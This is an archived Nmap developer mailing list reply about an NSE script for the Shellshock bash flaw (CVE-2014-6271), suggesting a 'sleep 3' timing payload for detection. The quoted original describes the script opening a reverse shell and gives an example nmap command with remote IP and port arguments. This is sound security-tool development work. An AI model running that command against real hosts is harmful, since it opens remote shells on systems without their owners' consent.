Nmap Development mailing list archives
Re: Shell Shock NSE Script (CVE-2014-6271)
From: Dean Pierce <pierce403 () gmail com>
Date: Mon, 29 Sep 2014 13:07:27 -0700
I feel like having a payload of something like "sleep 3" would make more sense than the various pingback methods. Then if you just wait to see if the request takes ~3 seconds rather than having to set up a listener on some publicly exposed server. - DEAN On Fri, Sep 26, 2014 at 1:45 AM, Paul Amar <paul () sensepost com> wrote:
Hi list, I created a NSE script for the Shell Shock vulnerability (CVE-2014-6271). I tested the script with Pentesterlab's VM located here: files.pentesterlab.com/cve-2014-6271/cve-2014-6271.iso. This script detects if the host is vulnerable. If so, you get a reverse shell by specifying the good arguments. Eg. ./nmap -p80 --script http-vuln-cve-2014-6271.nse --script-args http-vuln-cve-2014-6271.remoteIp=<your-ip>,http-vuln-cve-2014-6271.remotePort=<your-port>,http-vuln-cve-2014-6271.uri=/cgi-bin/status <ip> -d Feel free if you have any feedback, Paul _______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
_______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
Current thread:
- Shell Shock NSE Script (CVE-2014-6271) Paul AMAR (Sep 26)
- Re: Shell Shock NSE Script (CVE-2014-6271) Jacek Wielemborek (Sep 26)
- Re: Shell Shock NSE Script (CVE-2014-6271) Jacek Wielemborek (Sep 28)
- <Possible follow-ups>
- Shell Shock NSE Script (CVE-2014-6271) Paul Amar (Sep 26)
- Re: Shell Shock NSE Script (CVE-2014-6271) Dean Pierce (Sep 29)
- Re: Shell Shock NSE Script (CVE-2014-6271) Jacek Wielemborek (Sep 26)